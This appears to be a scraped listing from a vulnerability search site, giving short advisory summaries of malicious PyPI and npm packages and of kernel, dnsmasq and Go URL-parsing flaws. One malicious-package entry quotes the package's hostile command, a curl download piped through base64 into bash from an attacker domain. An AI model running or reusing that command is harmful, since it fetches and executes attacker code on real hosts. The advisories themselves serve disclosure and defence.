CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

OSV•added 2026/05/26 1:7 p.m.•5 views

MAL-2026-4809 Malicious code in baidubsrc (PyPI)

6AI score

OSSF Malicious Packages•added 2026/05/26 12:50 p.m.•8 views

Malicious code in docontrol-mcp (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 b4326be57466c23f5347d67f1e2adcd9c1b508ffc42b04ebcadfe7c85bd75a97 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

Snyk•added 2026/05/26 12:30 p.m.•4 views

Symlink Attack

Overview Affected versions of this package are vulnerable to Symlink Attack via improper validation of symbolic links in the virt-handler process. An attacker can gain unauthorized access to privileged Unix sockets on the host by replacing a virtual machine console socket with a symlink to a...

9.9CVSS5.8AI score0.00121EPSS

Snyk•added 2026/05/26 12:30 p.m.•4 views

Symlink Attack

9.9CVSS5.5AI score0.00121EPSS

OSV•added 2026/05/26 12:7 p.m.•4 views

MAL-2026-4807 Malicious code in shop-minis (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6e9e3e4e8e9e12bac20967fa551c549a93915b33007d7e54f8bfe0eed26a216e On npm install, the package's postinstall script postinstall.js, run via scripts.postinstall = 'node postinstall.js' collects host identity — whoami,...

5.8AI score

OSSF Malicious Packages•added 2026/05/26 12:7 p.m.•10 views

Malicious code in shop-minis (npm)

5.8AI score

OSSF Malicious Packages•added 2026/05/26 10:43 a.m.•10 views

Malicious code in m-at-star-tools (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2 The package's sole consolescript m0scan m0scan/main.py:6-7 executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque...

6.4AI score

OSV•added 2026/05/26 9:49 a.m.•5 views

MAL-2026-4808 Malicious code in wm-idp-sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d2acf2a0d94ec1d2bada80f3251f5ecbea64d78ffadcab2b997b9708c2ae71cd package.json declares "node-fetch": "https://registry.ctzbg.com/wm-idp-sdk/node-fetch" — a direct HTTPS tarball URL hosted on a domain...

OSSF Malicious Packages•added 2026/05/26 8:9 a.m.•15 views

Malicious code in @autofleet/rabbit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a766d89a5ed19491bd107e5d31c79fbbe7a9be9bce2a957b290408fb9f54140c The package's compiled entry dist/index.js:48 defines let host = process.env.RABBITMQSERVICEHOST || '35.240.13.28' and then connects via...

OSV•added 2026/05/26 8:9 a.m.•6 views

MAL-2026-4787 Malicious code in @autofleet/rabbit (npm)

OSSF Malicious Packages•added 2026/05/26 7:20 a.m.•9 views

Malicious code in react-ui-polyfills (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 63c43460df1ee670b8a5982d77e7028aef7df25fa38922f743489fd52b41b5ea Package advertises itself as React polyfills / UI compatibility helpers but ships no React or polyfill code. The exported getPlugin function returns ...

5.7AI score

Exploits0References3

RedHat Linux•added 2026/05/26 6:6 a.m.•8 views

kernel: Linux kernel KVM: Privilege escalation or denial of service due to improper shadow page table entry handling

A flaw was found in the Linux kernel's Kernel-based Virtual Machine KVM component. A local attacker with privileges on the host system could exploit a vulnerability in how KVM handles shadow page table entries SPTEs during memory-mapped I/O MMIO operations. By manipulating guest page table entrie...

5.5CVSS5.8AI score0.00011EPSS

Exploits0References5

RedHat Linux•added 2026/05/26 5:9 a.m.•9 views

dnsmasq: DHCPv6 CLID buffer overflow in helper process

A heap buffer overflow was discovered in dnsmasq's DHCP script helper process. When processing DHCPv6 client identifiers CLIDs, the helper hex-encodes the raw CLID bytes into a fixed-size buffer without length validation. Since DHCPv6 CLIDs can be up to 65,535 bytes, a crafted DHCPv6 packet can...

8.4CVSS5.9AI score0.00013EPSS

Exploits1References5

RedHat Linux•added 2026/05/26 4:27 a.m.•10 views

net/url: Incorrect parsing of IPv6 host literals in net/url

The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid...

7.5CVSS7.3AI score0.00044EPSS

Exploits0References8

RedHat Linux•added 2026/05/26 3:56 a.m.•6 views

net/url: Incorrect parsing of IPv6 host literals in net/url

7.5CVSS7.3AI score0.00044EPSS

Exploits0References8

RedHat Linux•added 2026/05/26 3:45 a.m.•9 views

net/url: Incorrect parsing of IPv6 host literals in net/url

7.5CVSS7.3AI score0.00044EPSS

Exploits0References8

OSSF Malicious Packages•added 2026/05/26 3:30 a.m.•9 views

Malicious code in mistral-search-toolkit (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 4f3c615d5d39af7634550be88e5630a25b7a3dbd5bd2a8717cb01f07f06a5cd2 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

OSV•added 2026/05/26 3:30 a.m.•5 views

MAL-2026-4358 Malicious code in mistral-search-toolkit (PyPI)

OSSF Malicious Packages•added 2026/05/26 2:50 a.m.•9 views

Malicious code in mistral-workflows-plugins-webhook (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 e87825efe9006ca3d435869b276f0d8526a1255ec71ac6e7aa0ea1bb068b6673 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...